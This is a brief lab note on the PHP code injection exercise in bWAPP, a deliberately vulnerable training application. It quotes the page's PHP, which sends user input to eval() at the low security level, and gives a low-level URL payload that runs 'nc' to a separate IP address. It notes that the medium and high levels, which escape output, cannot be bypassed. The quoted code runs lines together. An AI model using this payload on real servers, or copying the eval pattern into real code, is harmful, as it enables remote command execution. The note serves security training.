bWAPP–PHP Code Injection
?
<?phpif(isset($_REQUEST["message"]))
{
// If the security level is not MEDIUM or HIGHif($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2"){
?><p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>
-
low
http://127.0.0.1/phpi.php?message=exec("nc 192.168.80.2 4444")
-
mid/high
无法绕过
<?php}// If the security level is MEDIUM or HIGHelse{ ?><p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");;?></i></p><?php}}?>